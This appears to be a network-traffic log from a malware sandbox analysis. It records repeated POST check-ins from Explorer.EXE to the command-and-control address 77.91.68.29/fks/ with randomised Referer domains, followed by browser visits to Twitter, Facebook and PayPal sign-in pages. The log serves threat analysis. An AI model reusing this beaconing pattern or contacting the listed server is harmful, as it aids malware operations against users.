Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://atvrb.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 365
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jkmoahmwi.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 153
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fnykbxpr.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 316
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:19 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jqnewjl.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 248
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kmqmluja.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 359
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 38
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

abs.twimg.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

abs.twimg.com

IN A

Response

abs.twimg.com

IN CNAME

cs510.wpc.edgecastcdn.net

cs510.wpc.edgecastcdn.net

IN A

152.199.21.141
GET

https://abs.twimg.com/errors/logo46x38.png

MicrosoftEdgeCP.exe

Remote address:

152.199.21.141:443

Request

GET /errors/logo46x38.png HTTP/2.0
host: abs.twimg.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://twitter.com/i/flow/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-origin: *
age: 28401626
content-type: image/png
date: Mon, 30 Oct 2023 06:48:19 GMT
etag: "7vm/v2DloVVWH9dCWPNBNA=="
expires: Tue, 29 Oct 2024 06:48:19 GMT
last-modified: Wed, 25 May 2022 20:43:56 GMT
server: ECAcc (ama/4884)
strict-transport-security: max-age=631138519
surrogate-key: twitter-assets
timing-allow-origin: https://twitter.com, https://mobile.twitter.com
x-cache: HIT
x-connection-hash: 2e040e750008c114da89f4533a7e4e754ebf4b509ddb5d4e76aa89ba44abe030
x-content-type-options: nosniff
x-response-time: 7
x-ton-expected-size: 1015
content-length: 1015
DNS

141.21.199.152.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.21.199.152.in-addr.arpa

IN PTR

Response
DNS

facebook.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

163.70.151.35
GET

https://facebook.com/security/hsts-pixel.gif?c=3.2

MicrosoftEdgeCP.exe

Remote address:

163.70.151.35:443

Request

GET /security/hsts-pixel.gif?c=3.2 HTTP/2.0
host: facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 302

location: https://fbcdn.net/security/hsts-pixel.gif?c=2
reporting-endpoints:
cross-origin-opener-policy: same-origin-allow-popups
access-control-allow-origin: *
strict-transport-security: max-age=15552000; includeSubDomains
content-type: text/html; charset="utf-8"
x-fb-debug: seJcvigCjQo+uttbyyjo41mI/2xdXC1sSP5t2F1a17NNnz6VZ0tdlz1BAfrsTgiFRTqkMZr57Fvfu9sgdKfS2w==
content-length: 0
date: Mon, 30 Oct 2023 06:48:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://www.paypal.com/signin

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /signin HTTP/2.0
host: www.paypal.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-YvWiGmeSUi5Tart7U/HG7aqAuA1Esd81seXTQgBNaxucswPc' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: text/html; charset=utf-8
date: Mon, 30 Oct 2023 06:48:21 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"1a59-eqIVyuLY9KYCQviJcRmi+zqkdKE"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: 0752753582382
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
server: ECAcc (frc/4CA4)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Tue, 29 Oct 2024 06:48:21 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Mon, 30 Oct 2023 15:34:17 GMT; HttpOnly; Secure
set-cookie: htdebug=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
set-cookie: tsrce=authchallengenodeweb; Max-Age=259199; Domain=.paypal.com; Path=/; Expires=Thu, 02 Nov 2023 06:48:20 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODUwMTU2MSIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: nsid=s%3AAQUVizFN1FmZUKFC1oFjJpB6tTVjuU55.Jv0%2FclXeN8rLVMvg2gDreo3meFj9saf3VPcF%2FSFkRBA; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg15.slc; Path=/; Domain=paypal.com; Expires=Mon, 30 Oct 2023 07:18:21 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793342901%26vteXpYrS%3D1698650301%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:48:21 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:48:21 GMT; Secure
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-00000000000000000000752753582382-3524bf67875716c7-01
vary: Accept-Encoding
vary: Accept-Encoding
vary: Accept
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
POST

https://www.paypal.com/auth/logclientdata

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

POST /auth/logclientdata HTTP/2.0
host: www.paypal.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/json;charset=UTF-8
accept-encoding: gzip, deflate, br
content-length: 509
cache-control: no-cache
cookie: enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=authchallengenodeweb; x-pp-s=eyJ0IjoiMTY5ODY0ODUwMTU2MSIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg15.slc; ts=vreXpYrS%3D1793342901%26vteXpYrS%3D1698650301%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; nsid=s%3AAQUVizFN1FmZUKFC1oFjJpB6tTVjuU55.Jv0%2FclXeN8rLVMvg2gDreo3meFj9saf3VPcF%2FSFkRBA

Response

HTTP/2.0 200

content-encoding: gzip
accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-ioPdjNAKBvggzZsStcwlxkFY8w54qjmSuZytjelsSDeejJ32' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
date: Mon, 30 Oct 2023 06:48:33 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"766-UYJ9OaZaUPg8pz7Emz6/4NEygno"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: 034015394a70b
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
server: ECAcc (frc/4CD6)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Mon, 30 Oct 2023 15:34:29 GMT; HttpOnly; Secure
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Tue, 29 Oct 2024 06:48:33 GMT; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODUxMzU1MiIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg15.slc; Path=/; Domain=paypal.com; Expires=Mon, 30 Oct 2023 07:18:33 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793342913%26vteXpYrS%3D1698650313%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:48:33 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:48:33 GMT; Secure
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-0000000000000000000034015394a70b-16590e3b3ad2d4c2-01
vary: Accept-Encoding
vary: Accept-Encoding
vary: Accept
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
POST

https://www.paypal.com/auth/logclientdata

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

POST /auth/logclientdata HTTP/2.0
host: www.paypal.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/json;charset=UTF-8
accept-encoding: gzip, deflate, br
content-length: 540
cache-control: no-cache
cookie: enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=authchallengenodeweb; x-pp-s=eyJ0IjoiMTY5ODY0ODUxMzU1MiIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg15.slc; ts=vreXpYrS%3D1793342913%26vteXpYrS%3D1698650313%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; TLTSID=62544276781500915456071760049843; nsid=s%3AAQUVizFN1FmZUKFC1oFjJpB6tTVjuU55.Jv0%2FclXeN8rLVMvg2gDreo3meFj9saf3VPcF%2FSFkRBA

Response

HTTP/2.0 200

content-encoding: gzip
accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-HBdOYKfic/wLplFRjSgaa3qIzuwCzGHtW+CKUqZF8v2ZKyf2' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
date: Mon, 30 Oct 2023 06:48:43 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"76f-m4Jw/OX3+frc0sX+OH19DBOjc6s"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: 0a80a75442109
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
server: ECAcc (frc/4CC7)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Tue, 29 Oct 2024 06:48:43 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Mon, 30 Oct 2023 15:34:39 GMT; HttpOnly; Secure
set-cookie: TLTSID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODUyMzgzMiIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg15.slc; Path=/; Domain=paypal.com; Expires=Mon, 30 Oct 2023 07:18:43 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793342923%26vteXpYrS%3D1698650323%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:48:43 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:48:43 GMT; Secure
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-00000000000000000000a80a75442109-8e9816530e1b15f6-01
vary: Accept-Encoding
vary: Accept-Encoding
vary: Accept
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
POST

https://www.paypal.com/csplog/api/log/csp

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

POST /csplog/api/log/csp HTTP/2.0
host: www.paypal.com
accept: */*
content-type: application/csp-report
referer: https://www.paypal.com/signin
accept-language: en-US
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-length: 2248
cache-control: no-cache
cookie: enforce_policy=ccpa; LANG=en_US%3BUS; tsrce=authchallengenodeweb; x-pp-s=eyJ0IjoiMTY5ODY0ODUyMzgzMiIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg15.slc; ts=vreXpYrS%3D1793256550%26vteXpYrS%3D1698650350%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; TLTSID=62544276781500915456071760049843; nsid=s%3AAQUVizFN1FmZUKFC1oFjJpB6tTVjuU55.Jv0%2FclXeN8rLVMvg2gDreo3meFj9saf3VPcF%2FSFkRBA

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypalobjects.com; script-src 'nonce-NN74Jt84vJ0NTmBV+izHhMvDV77kZ5n3JjzjmcO0amAwa0vW' 'self' https://*.paypal.com https://*.paypalobjects.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypalobjects.com; img-src https://*.paypal.com https://*.paypalobjects.com; object-src 'none'; font-src 'self' https://*.paypalobjects.com; form-action 'self' https://*.paypal.com; base-uri 'self' https://*.paypal.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp; frame-src 'self' https://*.paypal.com https://*.paypalobjects.com https://*.qualtrics.com; connect-src 'self' https://*.paypal.com https://*.paypalobjects.com https://*.qualtrics.com;
content-type: text/plain; charset=utf-8
date: Mon, 30 Oct 2023 06:49:16 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: 0a8384b63aa78
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
server: ECAcc (frc/4CFE)
server-timing: content-encoding;desc="", x-cdn;desc="edgecast"
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Tue, 29 Oct 2024 06:49:16 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Mon, 30 Oct 2023 15:35:12 GMT; HttpOnly; Secure
set-cookie: TLTSID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODY0ODU1NjU0OCIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: tsrce=cspreportnodeweb; Domain=.paypal.com; Path=/; Expires=Thu, 02 Nov 2023 06:49:16 GMT; HttpOnly; Secure; SameSite=None
set-cookie: l7_az=dcg15.slc; Path=/; Domain=paypal.com; Expires=Mon, 30 Oct 2023 07:19:16 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793342956%26vteXpYrS%3D1698650356%26vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:16 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D7f572cee18b0a79830447bb8fd660cb5%26vt%3D7f572cee18b0a79830447bb8fd660cb4; Path=/; Domain=paypal.com; Expires=Thu, 29 Oct 2026 06:49:16 GMT; Secure
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: *
traceparent: 00-00000000000000000000a8384b63aa78-3cdc038d0d5a96f5-01
vary: Accept-Encoding
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
content-length: 2
POST

https://www.paypal.com/platform/tealeaftarget

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

POST /platform/tealeaftarget HTTP/2.0
host: www.paypal.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/json
x-pageid: P.3D25VXD73YNWSC8JMJXFMFEWQ9FJ
x-tealeaf: device (UIC) Lib/6.2.0.2010
x-tealeaftype: GUI
x-tealeaf-page-url: /signin
x-tealeaf-syncxhr: false
x-tealeaf-messagetypes: 1,2,5,6,7,12,14
x-tealeaf-saas-appkey: 76938917d7504ff7a962174c021690bd
x-tealeaf-saas-tltsid: 62544276781500915456071760049843
content-encoding: gzip
x-requested-with: fetch
accept-encoding: gzip, deflate, br
content-length: 2890
cache-control: no-cache
